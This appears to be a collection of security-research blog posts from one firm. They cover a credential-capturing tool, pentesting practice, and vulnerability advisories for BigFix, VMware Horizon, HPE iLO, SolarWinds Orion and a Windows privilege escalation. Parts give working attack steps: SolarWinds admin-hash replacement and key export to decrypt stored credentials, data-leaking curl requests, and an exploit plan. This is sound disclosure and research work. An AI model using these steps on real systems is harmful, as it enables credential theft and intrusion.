  ctx->pc_ptr = pc + 1;
  ctx:v4 = ctx;
  v7 = sp[-stack_offset];
  v5 = *(_DWORD *)&v7.type;
  ctx:v4->stack_ptr = sp + 1;
  *(_DWORD *)&sp[1].type = v5;
  HIBYTE(sp[1].value) = HIBYTE(v7.value);
  tvm_value_incref(ctx:v4, (struct tvm_value *)&v7);
  return 0;

The implementation reads the next byte from the instruction stream, uses this byte as the negative offset to read from the top of the stack, and then copies that value to the next stack entry. Finally, the function increases the reference count in the tvm_value. The lack of a bounds check allows referencing memory outside of the stack for the tvm_value copy resulting in multiple primitives including use-after-free.

What next?

Well, those are a handful of bugs found via static code analysis. They were also found by accident without a dedicated plan of attack or comprehensive audit of the TVM attack surface. While the TVM appears clean in design and implementation, these bugs suggest the CIQ applications were likely not considered attack surface in the past. Finding more of the lower hanging bugs should be straightforward using a dynamic fuzzing approach. Unfortunately, doing so on an off-the-shelf device is slow and lacks reliability. An interesting next step would be running the firmware, either stock or modified, on a devkit or within a QEMU emulated environment.

We've spent some time working towards a functioning QEMU patch that emulates the MAX32630 and some of the relevant peripherals. We're not yet to the point where the watch comes all the way up but have learned more and more about the firmware in the process. A more direct approach would set up a runtime state that allowed just the PRG loader and TVM interpreter to run. This seems possible but the Garmin RTOS provides a number of services that would need to be stubbed out.

Another interesting task would be to finish a full code execution exploit for these bugs and to pivot towards exploitation of one of the attached microcontrollers (the Bluetooth controller, for instance).

Edit (11-18-2020): Clarified firmware current during analysis and added a link to the updated (patched) firmware.

This blog post was written by Dion Blazakis, technical peer review by Zach Lanier, and edited for the web by Lacey Kasten at Atredis Partners.

Flamingo Captures Credentials

27 January 2020 at 15:04

Far too many products will blindly spray credentials across the network as part of discovery, monitoring, or security scanning tasks. Identifying these products and capturing these credentials requires patiently waiting for the next scan cycle and implementing whichever protocol the product tries to authenticate with. If this is done during a security assessment, the capture process may need to run on a compromised internal server, introducing additional challenges.

During the last Atredis offsite, Chris Bellows suggested that we build better tooling for this, focusing on the protocols that other tools miss and on delivering portable binaries for use on compromised servers. This led to the creation of flamingo, an open-source utility that spawns a bunch of network daemons, waits for inbound credentials, and reports them through a variety of means.

Flamingo is written in Go, includes pre-compiled binaries, and has already received one pull request from outside of Atredis (thanks Alex!). Flamingo can capture inbound credentials for SSH, HTTP, LDAP, FTP, and SNMP, as well as log inbound DNS (and mDNS) queries. On the output side, Flamingo can log to a file, standard output, deliver to a webhook, write to a remote syslog server, or all of those at once. As a Go binary, everything is baked into a single executable, and it cross-compiles to almost every supported Go platform and architecture. Go is awesome for security tool development and was a great fit for this problem.

Flamingo is not Responder. Responder is an amazing tool that listens on the network, responds to name requests, and captures credentials. While the main goal of Responder is to coerce systems on the same broadcast domain into sending it Active Directory credentials, Flamingo takes a more passive approach, and does not actively solicit connections through LLMNR or NetBIOS responses. For most scenarios where you want to capture Active Directory credentials, Responder is still your tool of choice.

In addition to portability, configurable outputs, and different protocol support, Flamingo has other unique capabilities worth mentioning.

Flamingo's SSH capture stores all the normal things for password-based authentication, but also reports the entire SSH public key for pubkey-based authentication. This public key can be used to half-auth-scan the local network and identify servers where that credential is accepted. The public key can also be correlated against public keystores, such as Github.com users, to identify the user responsible for the pubkey authentication attempt.

Flamingo supports Nmap-style port ranges for all listeners. Want to spawn a few different SSH servers? Go for it with --ssh-ports 22,2222,4022,6022,8022. How about 100? Sure, with --ssh-ports 1-100. This works across all supported protocols and will try to bind to as many ports as it can, ignoring conflicts, unless the --dont-ignore flag is set. Want to run a mix of plain HTTP and HTTPS services? Use the –-http-ports and –-https-ports parameters to separately define lists of plaintext and encrypted web servers as needed. Only care about LDAP over TLS today? Set –-protocols ldap, --ldap-ports to an empty string, and –-ldaps-ports to your desired list.

Flamingo generates new SSH and TLS keys on startup, by default, and shares these keys across all services. This behavior can be changed by specifying the the --ssh-host-key, --tls-cert, and –-tls-key options, but its nice to not have to worry about it too. The --tls-org option can be used to set the presented organization name in the TLS certificate and the --tls-name option can be used to set the advertised server name in responses.

Flamingo can also support blue teams by feeding authentication attempts into a central reporting system. Drive alerts from your SIEM of choice, either through log parsing, syslog destinations, or plain old webhooks. Flamingo is no Canary, but can be helpful in a pinch, and is certainly a lot more portable than most honeypot listeners.

In summary, we think Flamingo is neat, and would love your feedback and pull requests. If you need a local LLMNR/NetBIOS/mDNS poisoner, Responder is still your tool of choice. If you need a commercial-quality honeypot, Canary is going to be a much better time investment. If you are looking for a tool to capture credentials sprayed by various IT and security scanners, Flamingo might be useful, especially if you need portable binaries and flexible real-time output options. We plan continue building out Flamingo's protocol support and implementing additional output types going forward. If you have any suggestions or run across any bugs, please file an issue in the Github tracker.

-HD and Tom

Use the Source, Luke

27 August 2019 at 17:00

Your pentesters should be asking for source code. And you should probably be sharing it.

One of my favorite things about working at Atredis Partners is that part of our research-centric model includes throwing folks at all kinds of targets that they've never seen before. First chairs on projects are always going to be in their comfort zone, but for second chairs, we like to mix things up a bit, because it helps folks grow and we often find new ways of looking at things that we've collectively looked at the same way for years.

This not only means that folks from traditional pentesting backgrounds get to grow into doing things like hardware or mobile hacking, it also means that I get to watch people with backgrounds in say, reverse engineering or exploit development take a look at a network perimeter or a web app, which yields some great new perspectives.

Last week, I was on an internal kickoff call for what was ostensibly an assessment of an API on a public webserver. There were some other targets that were more complex than that, but for this part of the call, we were discussing testing the API. Two people on the team were coming at the target from a more bughunting-centric background, and were asking about how we'd be testing.

"So, are they gonna give us source code?"

"Probably not, they seemed pretty cagey about it. I can ask again, though..."

"That's stupid."

"I mean, I guess it kinda is. A lot of times we'll just get say, API docs, and some example code, maybe cobble together an API client to throw traffic at it, tool around with requests in Burp, that sort of thing."

"How about shell access to the server while you're testing so you can debug?"

"Uh, I dunno, like I said, these folks were pretty cagey about sharing much beyond access to the API itself."

"Jeez. Well, I guess they don't want us to find anything."

I was a bit dumbstruck at first, because a lot of the time, that's all you'll get for a web app or web services assessment, a couple of logins, maybe a walkthrough of the app, and then, well, yeah, actually... Good luck finding anything. It was a useful reminder how wrongheaded it is to be on the hook for finding all the bugs in something without source code.

We do ask for source, and shell access, for pretty much any software assessment we do. But we often get told no. Even more often than that, the client tells us "nobody's ever asked me that before."

And that is dumb.

Runtime testing alone is absolutely not the right way to find the most bugs possible, in the least amount of time, in pretty much any target. It's a way to find an opportunistic subset of the bugs that are floating at or very near the surface.

How likely is runtime testing to find more complex bugs several layers deep in the app, or that are only exploitable in a very narrow window in-session? What about finding the ten other places you're vulnerable to SSRF, all of which require a more complex trigger than the single case your tester found at runtime? How likely are your devs to fix every vector, when they only know about one? And how likely is it that a dev will find a way down the road to expose the other ten?

Source allows you to identify all kinds of systemic problems in an application that you just don't see when you're flinging yourself willy-nilly at a web interface or web service, or any software target, really. It allows you to confirm runtime findings and weed out false positives, and follow the bugs you found at runtime down into the bowels of the broken function or ugly third party library that spawned them.

So why don't more folks do source-driven or source-assisted pentests?

Well, for one thing, a lot of pentesters out there can't read the source in the first place, so it wouldn't help them much. You need more seasoned people, typically with some dev experience, to get any value out of sharing your source code. The last thing you want is a mountain of crappy informational bugs that somebody lifted from whole cloth out of a source code scanner report, trust me.

And yes, of course, there are the IP concerns. I get that. Folks will tell us their source code contains trade secrets, it's sensitive, it's HIPAA protected, it's export controlled, it's buried underground and written on stone tablets, etc, etc. I don't see IP problems as particularly insurmountable. They can be odious, sure; we've flown overseas to look at code that couldn't leave a building, we've had devs scroll through source over Skype, sat in a locked room auditing source on client-provided systems with cameras on us, you name it. There are ways to give access to source in a controlled fashion, if source code leaving the building is a concern.

A third reason, related to the above, and I think the biggest one, is that it's more work for the testing team and for the client. The testing team has to add source review to their workflow, map the bugs they found at runtime back to source, and chase down bugs found in source to see if they're exploitable in the wild. On the client end, the client has to go wrangle devs for repo access (which the internal security team often doesn't even have themselves) and often has to figure out either how to get the testing team inside the corporate LAN, or how to schlep a 120MB tarball over to the tester.

It's far easier to just re-enable the "pentester1" and "pentester2" accounts from last year's test and get back to reading /r/agedlikemilk (which is pretty funny, to be fair). Besides, you're probably just going to rotate firms next year, so what's the point?

Seriously folks, if you have an in-house developed app, especially if it's part of your core business, you're wasting time on "black box" testing. Give your testing team full source access and full transparency, and they'll find bugs that have been missed by other teams doing runtime testing for years. I know this, because we do, every time a client takes us up on the request.

While I'm at it, let's dispense with the old saw that black box testing is so you can see "how long a real hacker would take to break this"... "Real" hackers get to take as long as they need to until they land a shell, plus they get to wear sunglasses, a hoodie and a ski mask while they do it. I have yet to have a client offer our team the luxury of unlimited time, and ski masks tend to make for awkward video calls with the CSO.

CVE-2019-4061: Harvesting Data from BigFix Relay Servers

18 March 2019 at 15:45

External security assessments are one of my favorite parts of working at Atredis. I love the entire process, from sifting through mountains of data to identify the customer’s scope to digging deep into commercial products that we find deployed on the perimeter, it is challenging work and a lot of fun.

A recent service of interest was an externally-exposed IBM BigFix Relay Server. This service provides a HTTP-over-TLS endpoint on TCP port 52311 that enables system administrators to deploy patches to devices outside their firewall, without forcing the use of a VPN. This is great when an update needs to be deployed that involves the VPN itself, but can be problematic from a security perspective.

After identifying an external BigFix Relay Server, Chris Bellows, Ryan Hanson, and I started to dig into the communications protocol between the relay and the client-side agent. We found that unauthenticated agents could enumerate and download almost all deployed packages, updates, and scripts hosted in the BigFix environment. In addition to data access, we also found a number of ways to gather information about the remote environment through the relay service.

The TL;DR of our advisory is that if BigFix is used with an external relay, Relay Authentication should be enabled. Not doing so exposes a ridiculous amount of information to unauthenticated external attackers, sometimes leading to a full remote compromise. Also note than an attacker who has access to the internal network or to an externally connected system with an authenticated agent can still access the BigFix data, even with Relay Authentication enabled. The best path to preventing a compromise through BigFix is to not include any sensitive content in uploaded packages. IBM also addresses this issue on the PSIRT blog.

BigFix uses something called a “masthead” to publish information about a given BigFix installation. The masthead is available on both normal and relay versions of BigFix at the URL https://[relay]:52311/masthead/masthead.axfm.

The masthead includes information such as the server IP, server name, port numbers, digital signatures, and license information, including the email address of the operator who licensed the product. This information can be immediately useful on its own, but its just the tip of the iceberg.

BigFix uses a concept called Sites to organize assets. A full index of configured Sites can be obtained through the URL https://[relay]:52311/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands. This site listing provides deep visibility in the organization’s internal structure.

Going further, an attacker can obtain a list of package names and versions by requesting the URL https://[relay]:52311/cgi-bin/bfenterprise/BESMirrorRequest.exe. This tells an attacker exactly what versions of what software are installed across the organization. The package list is split into specific Actions, which each have the following format:

Action: 21421

url 1: http://[BigFixServer.Corporate.Example]:52311/Desktop/CreateLocalAdmin.ps1

url 2: http://[BigFixServer.Corporate.Example]:52311/Desktop/SetBIOSPassword.ps1

In order to download package contents from a relay, the package must first be refreshed in the mirror cache. This can be accomplished by requesting URL ID "0" of the Action ID in the URL https://[relay]/bfmirror/downloads/[action]/0

Once the data has been cached, individual sub-URLs may be downloaded by ID https://[relay]/bfmirror/downloads/[action]/1

Automating the process above is straightforward and allows an attacker to obtain copies of the published packages. As hinted above, sometimes these packages include sensitive data, and sometimes this data can be used to directly compromise the organization.

In order to determine how common this issue was, we conducted an internet-wide survey of the IPv4 space, looking for the BigFix masthead file on externally exposed relay servers. Of the ~3.7 billion addressable IPv4 addresses, we found almost 1,500 BigFix Relay servers with Relay Authentication disabled. This list included numerous government organizations, large multinational corporations, health care providers, universities, insurers, major retailers, and financial service providers, along with a healthy number of technology firms. For each identified relay, we queried the masthead and obtained a package list, but did not download any package data.

Shortly after conducting the survey, we reached out to the BigFix product team to start the vulnerability coordination process. The BigFix team has been great to work with; quick to respond and interested in the best outcome for their customers. Over the last three months, the BigFix team has improved their documentation and notified affected customers. As of March 18th, that process has been completed.

In total, our survey found 1,458 exposed BigFix Relay Servers, with versions,, and being the most common. Looking at just “uploaded” packages (custom things uploaded into BigFix by operators), we identified over 25,000 unique files.

Quite a few of these uploaded files appear to contain sensitive data based on the filename.

Encryption and authentication keys





Scripts to set the administrator password







In summary, anyone using BigFix with external Relay Servers should enable Relay Authentication as soon as possible. All BigFix users should review their deployed packages and verify that no sensitive information is exposed, including encryption keys and scripts that set hardcoded passwords. Finally, for folks conducting security assessments, keep an eye out for port 52311 on both internet-facing and internal networks.


CVE-2019-5513: Information Leaks in VMWare Horizon

15 March 2019 at 18:07

The VMWare Horizon Connection Server is often used as an internet-facing gateway to an organization’s virtual desktop environment (VDI). Until recently, most of these installations exposed the Connection Server’s internal name, the gateway’s internal IP address, and the Active Directory domain to unauthenticated attackers.

Information leaks like these are not a huge risk on their own, but combined with more significant vulnerabilities they can make a remote compromise easier. I love these kinds of bugs because they provide a view through the corporate firewall into the internal infrastructure, providing insight into naming and addressing conventions.

The Atredis advisory and the VMWare advisory are now online and contain additional details about the the issues and available fixes.

Testing for these issues is straight-forward; the following request to the /portal/info.jsp endpoint will return one or more internal IP addresses along with a version number:

$ curl https://host/portal/info.jsp

A POST request to the /broker/xml endpoint returns the broker-service-principal element in the XML response, which contains the service account name (machine account typically) the domain name:

$ curl -k -s -XPOST -H 'Content-Type: text/xml' https://host/broker/xml --data-binary $'<?xml version=\'1.0\' encoding=\'UTF-8\'?><broker version=\'10.0\'><get-configuration></get-configuration></broker>'


<name>[email protected]</name>

We would like to thank the VMware Security Response Center for their pleasant handling of this vulnerability report and their excellent communication. VMWare noted that this issue was also independently reported by Cory Mathews of Critical Start.

CVE-2018-7117: A Somewhat Accidental XSS in HPE iLO

8 March 2019 at 18:45


At Atredis Partners, we often use dedicated lab networks for testing devices. This helps isolate these devices from "production" networks, and affords us the opportunity to monitor all network communications to/from the device as well as conduct interesting attacks. In this post, we'll briefly discuss a somewhat unexpected find shortly after plugging in an enterprise-grade server during an engagement a few months ago.

(You can also jump straight to the advisory we released today)


I'd like to tell you this was some unique, esoteric device with some incredibly amazing, difficult-to-find, l33t bug ... but I'd be lying. Instead, this device was an HPE ProLiant DL380 Gen10 server, which is fairly common in many enterprise environments; and the bug was ... Cross-Site Scripting.

Now, before the XSS is lame chest-beating begins, bear in mind this bug was found not in a web application running on the host operating system, but rather in the Integrated Lights-Out (or "iLO") side of things. For those unfamiliar, HPE iLO allows system and network administrators the ability to manage and monitor servers through a separate, dedicated network interface, API, and UI. Typical iLO capabilities include, but are not limited to, checking system hardware health, managing device power options (including turning the device on/off), mounting drive images, and even a remote console (although some "enhanced" versions of iLO further restrict access to this and other features).

Once the server was hooked up to the lab network and ready to go, we began poking and prodding all over the place, including the iLO web UI. After logging in and browsing around, familiarizing ourselves with the interface, identifying input points, etc., my colleague messaged me, asking "Did you do this?":

Admittedly, I was a bit amused by this whole thing because 1) it was a bit of an unexpected discovery and 2) the lab network is configured to "automagically" help test for this and other, similar issues, so it's become almost hands-off or even second nature.

I quickly realized this was the result of how this lab network's DHCP server was configured -- providing different values for DHCP options so as to identify (and even trigger) XSS, command injection and the like in vulnerable clients.

Digging in a wee bit further, we realized it was the domain name (DHCP option 15) that was being rendered unsanitized in the iLO web UI.

We adjusted the DHCP server configuration to do a bit more than just alert(1), and forced the iLO to pull a new lease, resulting in:


While DHCP-provided "domain name" could contain a simple HTML <script> tag with a JavaScript alert box in the authenticated user's browser, an attacker could also specify an external JavaScript resource, providing greater opportunities and capabilities.

That said, there are some things to think about in terms of the real world impact here.

For starters, security best practices, including those straight from HPE, dictate that out-of-band management networks should be connected to a "dedicated management network that is isolated from the production network", though this may not always be implemented correctly, if at all. This means that an attacker would need to be network-adjacent to the target(s), either by gaining a foothold on a device connected to that network and/or by way of a rogue insider, in order to spin up a specially configured DHCP server.

Second, at least for this specific issue, the target iLO(s) would need to be configured to use DHCP, although this is the default.

Third, although slightly less important, egress filtering rules would potentially need to allow devices in the management network to contact external hosts, i.e. to pull external JavaScript and/or exfiltrate data. I say "slightly less important" because it isn't out of the realm of possibility to host JavaScript resources on/transmit captured data within the management network itself, assuming the attacker already has a foothold there.


Belated TL;DR: don't underestimate the power of having a lab environment configured for identifying these kinds of injection issues from the get-go, as you never know what you may find, even in what may seem to be an otherwise robust and "secure" platform.

For those who want to perform this kind of testing themselves, there are myriad ways to do so, such as simply configuring your DHCP server-of-choice to dole out "malicious" values in DHCP options, or using freely available tools (or writing your own) to handle the task. The latter could be anything from a Metasploit module to a modified version of pydhcp.

Fun with SolarWinds Orion Cryptography

26 October 2018 at 08:21


We run into a wide variety of network management solutions during our security assessments and penetration tests. The SolarWinds Orion product suite in particular is popular with network administrators and IT teams of all sizes. The Orion platform includes modules such as the Network Engineers Toolkit, Web Performance Monitor, and Network Configuration Management, among many others. We found some fun ways to abuse this product during security tests and wanted to share our notes with the community.

The Orion product uses a Microsoft SQL Server backend to store information about user accounts, network devices, and the credentials used to manage these devices. An Orion system used to manage a large network will typically use a standalone SQL Server installation, while smaller networks will use a local SQL Server Express instance. Since the Orion server houses credentials and can often be used to push and pull network device configurations, it can be a gold mine for expanding access during a penetration test.

Gaining access to the web console without a login

The Orion product is typically managed from the web console; this can use a local account database or an existing Active Directory service. An attacker can then monitor network traffic between the Orion server and a separate SQL Server instance, extracting hashed user passwords and encrypted network device credentials. An attacker that can man-in-the-middle the SQL Server communication can use this to login to the Orion web console with an arbitrary password by replacing the password hash when the web server queries the Accounts table during login. If direct access to the SQL Server database for Orion is possible, a modification to the Accounts table will allow for easy access to the console. If the attacker has local administrator access to the Orion server, they can modify the Accounts table using the Orion Database Manager GUI application. Regardless of how an attacker gains access to the Accounts table, the easiest approach to gaining access is to backup the existing hash, then replace the PasswordHash column for an enabled administrative user.  An empty PasswordHash for the "admin" user account corresponds to the following string:"


Note that this password hash is only valid for the "admin" user (see notes below on salting). The screenshot below shows the SQL query to reset the "admin" account to the empty password, using the SolarWinds Database Manager GUI (via local administrator access over Remote Desktop).

Once the PasswordHash has been replaced (or temporarily intercepted), the attacker can login with an empty password for the associated user account.  


SolarWinds Orion "Accounts" table password hashing

Orion password hashing is a variant of a salted SHA512 hash. The hash is computed by first generating a salt that consists of the lowercase username. If the salt is less than 8 bytes long, it is appended with bytes from the string "1244352345234" until it is 8 bytes. For example, the salt for username "ADMIN" would become "admin124", while the salt for "Bo" would become "bo124435". Once the salt has been calculated, a RFC2898 PBKFD2 is generated using the default iteration count of 1000 and the SHA1 hash algorithm. Finally, a SHA512 hash of the PBKDF2 output is taken and encoded using Base64. It doesn't appear that any existing tools support cracking passwords in this format, but Hashcat comes close with PBKDF2-HMAC-SHA1(sha1:1000) support, and is only missing the final call to SHA512(). This hashing function has been implemented in the Ruby script hash-password.rb.


Harvesting stored network credentials from the database

SolarWinds Orion stores network credentials within the SQL Server database tables. Some of these credentials, such as SNMP v1/v2c community strings, are stored in clear-text, while most are encrypted using a RSA key located in the Orion server local certificate store. Network credentials can be harvested from the database through passive monitoring or active exports, in the latter case, either using standard SQL Server management tools, or if local administrator access has been obtained on the Orion server, using the Database Manager GUI application. A partial list of tables that should be exported to collect credentials includes:

  • Accounts (Username, PasswordHash)

  • Credential (ID, Name)

  • CredentialProperty (ID, Name, Value)

  • Nodes (IPAddress, Community, RWCommunity)

  • NCM_Nodes [View] (Name, Username, Password , EnableLevel , EnablePassword)

  • NCM_GlobalSettings (SettingName, SettingValue)

  • NCM_NodeProperties (Username, Password, EnableLevel, EnablePassword)

  • NCM_ConfigSnippets (AdvancedScript)

  • NCM_ConnectionProfiles (Name, Username, Password, EnableLevel, EnablePassword)

  • SSH_Sessions (HostName, Username, Password)

  • SSO_Tokens

  • Traps (Community)

  • Traps (CommunityStrings (Community)

Decrypting stored network credentials

Network credentials stored within the SQL Server database are encrypted with a RSA key located in the local machine certificate store of the Orion server. For most SQL tables, these credentials are prefixed with the string "SWEN__", while the SSH sessions table uses a raw form without the prefix. To decrypt these credentials, the RSA key for the SolarWinds-Orion certificate must be exported from the system. This typically requires local administrator access and an elevated command shell on the Orion server. To export the key, use certutil:

C:\Temp> certutil -exportPFX -p Atredis my SolarWinds-Orion orion.pfx
my "Personal"
================ Certificate 0 ================
Serial Number: c0e0b5d49a84818048d614012d6c7497
Issuer: CN=SolarWinds-Orion
 NotBefore: 10/21/2018 6:26 PM
 NotAfter: 12/31/2039 6:59 PM
Subject: CN=SolarWinds-Orion
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): e60003315dd42f55adeb7f4c2071b6e9bc9dd996
  Key Container = 9292e92a-9fb9-4881-94cd-c8c582550268
  Unique container name: 7f96c35203d32d4fae1724bb52f38232_c5c554db-595b-4464-ac33-102a5379ad51
  Provider = Microsoft Strong Cryptographic Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.

If an error is returned stating “Keyset does not exist”, this typically means that the command was not run as an administrative user with elevated privileges. If certutils does not work for some reason, or if the cert has been marked unexportable, you can still export the private key using Jailbreak or Mimikatz.

Next, the PFX needs to be converted to a standard OpenSSL PEM file. The openssl command handles this with the following syntax: 

C:\Temp> openssl pkcs12 -in orion.pfx -out orion.pem -nodes -password pass:Atredis

Using the clear-text orion.pem file, the credentials in the exported database tables can be decrypted using the ruby scripts; decrypt-swen-credentials.rb and decrypt-ssh-sessions.rb. These scripts will read the RSA key from “orion.pem” and decrypt credentials found in all files passed as arguments, saving the results to files with the “.dec” extension. the Database Manager GUI includes a handy “Export to CSV” button that simplifies this process. The decrypt-ssh-sessions.rb script looks for the password fields in the SSHSessions table, which does not use the “SWEN” prefix. The following example demonstrates using the decrypt-swen-credentials.rb script against an export of the NCM_GlobalSettings table.

$ ruby decrypt-swen-credentials.rb NCM_GlobalSettings.csv 
$ cat NCM_GlobalSettings.csv.dec
"GlobalExecProtocol","SSH auto"


The SolarWinds Orion platform is a lot of fun for penetration testers, as it can act as a credential store, configuration management system, and remote command execution platform, depending on what modules are configured. As an added bonus, highly segmented networks often whitelist their network monitoring servers, making the SolarWinds server an attractive target for lateral movement. Although the password hashing and credential encryption is relatively sane from a security standpoint, they can be abused with the right tools. I hope the information above is useful and convinces you to pay special attention to network monitoring applications on your next penetration test.


Revolving Door Pentesting

19 October 2018 at 04:07

I recently had a client ask me if it makes sense to rotate security testing firms. "It's something I've always done, but I'm not sure if it really works or not."

I said in my experience, it doesn't really work very well at all.

I run into it less now than I did ten years ago, but there are still quite a few folks out there using a different firm for each annual pentest, or who never use the same firm on the same target more than once and keep a rotating roster of firms in the hopper.

What blows my mind about the whole switch-vendors-every-year mentality is that it's built around the presumption that most pentesters are terrible (plausible, in some cases) and are only going to try hard when you're a new client. There's also a perception that there's no value in building an ongoing relationship with a firm, since everyone does the same things, in the same order, to the same target every time.

On any of our engagements, the first time we look at a given target, we have to ramp up and learn everything we can about it: what mistakes your developers are more prone to make, what misconfigurations you made in your EDR deployment, how to keep from knocking the staging environment offline, which sysadmin knows how to bring it back up. The list goes on and on.

The early phases of a new assessment for a new client are a lot like the first few days on the job for a new employee. You won't really see productive results until they've learned the ropes a bit and have a handle on how things work (and don't work) in your environment.

You need to keep working with a pentest firm once they've ramped up on your environment for the same reason you need to keep employees: they've learned valuable things that someone new would have to relearn, and that's a poor use of time and resources if you have a seasoned person on hand to do the job.

When they wrap that first gig, a good pentester is already thinking about different and better ways to go after the target next time.

On the other side of things, if you're rotating firms over and over, and you don't see any value in follow-on projects, maybe you're not investing in the relationship yourself. Heck, maybe you don't even want to, maybe you just want another annual rotated-firm rubber-stamp assessment to keep the auditors happy. Maybe you're even cynical enough to admit that if you let the same firm hit the same targets two years in a row somebody would finally figure out how to get past the WAF and then you'd have a lot more work to do.

I've had people proudly say to me, "we have new people hit this every year and they find the same bugs". What they don't seem to understand is that it also follows that if you use the same people again, they'll most likely find new bugs. Or, if you really need "fresh eyes", use different resources from a firm you already trust.

To me, the goal of pentesting is to push things forward, or it should be: to iteratively test and improve a little each time, both as attackers and defenders. The best way to do that is to get attackers and defenders collaborating. Building a longstanding working relationship is a great way to do that.

CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service

21 August 2018 at 20:50

If you aren't interested in the adventure behind this bug hunt, ATREDIS-2018-0004 is a good TL;DR and here is the Proof-of-Concept.

Process Monitor has become a favorite tool of mine for both research and development. During development of offensive security tools, I frequently use it to monitor how the tools interact with Windows and how they might be detected. Earlier this year I noticed some interesting behavior while I was debugging some code in Visual Studio and monitoring with Procmon. Normally I setup exclusion filters for Visual Studio processes to reduce the noise, but prior to setting up the filters I notice a SYSTEM process writing to a user owned directory:

StandardCollector.Service.exe writing to user Temp folder

StandardCollector.Service.exe writing to user Temp folder

When a privileged service writes to a user owned resource, it opens up the possibility of symlink attack vector, as previously shown in the Cylance privilege escalation bug I found. With the goal of identifying how I can directly influence the service's behavior, I began my research into the Standard Collector Service by reviewing the service's loaded libraries:

Visual Studio DLLs loaded by StandardCollector.Service.exe

Visual Studio DLLs loaded by StandardCollector.Service.exe

The library paths indicated the Standard Collector Service was a part of Visual Studio's diagnostics tools. After reviewing the libraries and executables in the related folders, I identified several of the binaries were written in .NET, including a standalone CLI tool named VSDiagnostics.exe, here is the console output:

Help output from VSDiagnostics CLI tool

Help output from VSDiagnostics CLI tool

Loading VSDiagnostics into dnSpy revealed a lot about the tool as well as how it interacts with the Standard Collector Service. First, an instance of IStandardCollectorService is acquired and a session configuration is used to create an ICollectionSession:

Initial steps for configuring diagnostics collection session

Initial steps for configuring diagnostics collection session

Next, agents are added to the ICollectionSession with a CLSID and DLL name, which also stood out as an interesting user controlled behavior. It also made me remember previous research that exploited this exact behavior DLL loading behavior. At this point, it looked like the Visual Studio Standard Collector Service was very similar or the same as the Diagnostics Hub Standard Collector Service included with Windows 10. I began investigating this assumption by using OleViewDotNet to query the services for their supported interfaces:

Windows Diagnostics Hub Standard Collector Service in OleViewDotNet

Windows Diagnostics Hub Standard Collector Service in OleViewDotNet

Viewing the proxy definition of the IStandardCollectorService revealed other familiar interfaces, specifically the ICollectionSession interface seen in the VSDiagnostics source:

ICollectionSession interface definition in OleViewDotNet

ICollectionSession interface definition in OleViewDotNet

Taking note of the Interface ID ("IID"), I returned to the .NET interop library to compare the IIDs and found that they were different:

Visual Studio ICollectionSession definition with different IID

Visual Studio ICollectionSession definition with different IID

Looking deeper into the .NET code, I found that these Visual Studio specific interfaces are loaded through the proxy DLLs:

VSDiagnostics.exe function to Load Proxy Stub DLLs

VSDiagnostics.exe function to Load Proxy Stub DLLs

A quick review of the ManualRegisterInterfaces function in the DiagnosticsHub.StandardCollector.Proxy.dll showed a simple loop that iterates over an array of IIDs. Included in the array of IIDs is one belonging to the ICollectionSession:

ManualRegisterInterfaces function of proxy stub DLL

ManualRegisterInterfaces function of proxy stub DLL

Visual Studio ICollectionSession IID in array of IIDs to register

Visual Studio ICollectionSession IID in array of IIDs to register

After I had a better understanding of the Visual Studio Collector service, I wanted to see if I could reuse the same .NET interop code to control the Windows Collector service. In order to interact with the correct service, I had to replace the Visual Studio CLSIDs and IIDs with the correct Windows Collector service CLSIDs and IIDs. Next, I used the modified code to build a client that simply created and started a diagnostics session with the collector service:

Code snippet of client used to interact with Collector service

Code snippet of client used to interact with Collector service

Starting Procmon and running the client resulted in several files and folders being created in the specified C:\Temp scratch directory. Analyzing these events in Procmon showed that the initial directory creation was performed with client impersonation:

Session folder created in scratch directory with impersonation

Session folder created in scratch directory with impersonation

Although the initial directory was created while impersonating the client, the subsequent files and folders were created without impersonation:

Folder created without impersonation

Folder created without impersonation

After taking a deeper look at the other file operations, there were several that stood out. The image below is an annotated break down of the various file operations performed by the Standard Collector Service:

Various file operations performed by Standard Collector Service

Various file operations performed by Standard Collector Service

The most interesting behavior is the file copy operation that occurs during the diagnostics report creation. The image below shows the corresponding call stack and events of this behavior:

CopyFile operation performed by the Standard Collector Service

CopyFile operation performed by the Standard Collector Service

Now that I've identified user influenced behaviors, I construct a possible arbitrary file creation exploit plan:

  1. Obtain op-lock on merged ETL file ({GUID}.1.m.etl) as soon as service calls CloseFile
  2. Find and convert report sub-folder as mount point to C:\Windows\System32
  3. Replace contents of {GUID}.1.m.etl with malicious DLL
  4. Release op-lock to allow ETL file to be copied through the mount point
  5. Start new collection session with copied ETL as agent DLL, triggering elevated code execution

To write the exploit, I extended the client from earlier by leveraging James Forshaw's NtApiDotNet C# library to programmatically create the op-lock and mount point. The images below shows code snippet used to acquire the op-lock and the corresponding Procmon output illustrating the loop and op-lock acquisition:

Code snippet used to acquire op-lock on .etl file

Code snippet used to acquire op-lock on .etl file

Winning race condition with op-lock

Winning race condition with op-lock

Acquiring an op-lock on the file essentially stops the CopyFile race, allows the contents to be overwritten, and provides control of when the CopyFile occurs. Next, the exploit looks for the Report folder and scans it for the randomly named sub directory that needs to be converted to a mount point. Once the mount point is successfully created, the contents of the .etl are replaced with a malicious DLL. Finally, the .etl file is closed and the op-lock is released, allowing the CopyFile operation to continue. The code snippet and Procmon output for this step is shown in the images below:

Code snippet that creates mount point, overwrites .etl file, and releases op-lock

Code snippet that creates mount point, overwrites .etl file, and releases op-lock

Procmon output for arbitrary file write through mount point folder

Procmon output for arbitrary file write through mount point folder

There are several techniques for escalating privileges through an arbitrary file write, but for this exploit, I chose to use the Collector service's agent DLL loading capability to keep it isolated to a single service. You'll notice in the image above, I did not use the mount point + symlink trick to rename the file to a .dll because DLLs can be loaded with any extension. For the purpose of this exploit the DLL simply needed to be in the System32 folder for the Collector service to load it. The image below demonstrates successful execution of the exploit and the corresponding Procmon output:

SystemCollector.exe exploit PoC output

SystemCollector.exe exploit PoC output

Procmon output of successful exploitation

Procmon output of successful exploitation

I know that the above screenshots show the exploit was run as the user "Admin", so here is a GIF showing it being ran as "bob", a low-privileged user account:

Running exploit as low-privileged user

Running exploit as low-privileged user

Feel free to try out the SystemCollector PoC yourself. Turning the PoC into a portable exploit for offensive security engagements is a task I'll leave to the reader. The NtApiDotNet library is also a PowerShell module, which should make things a bit easier.

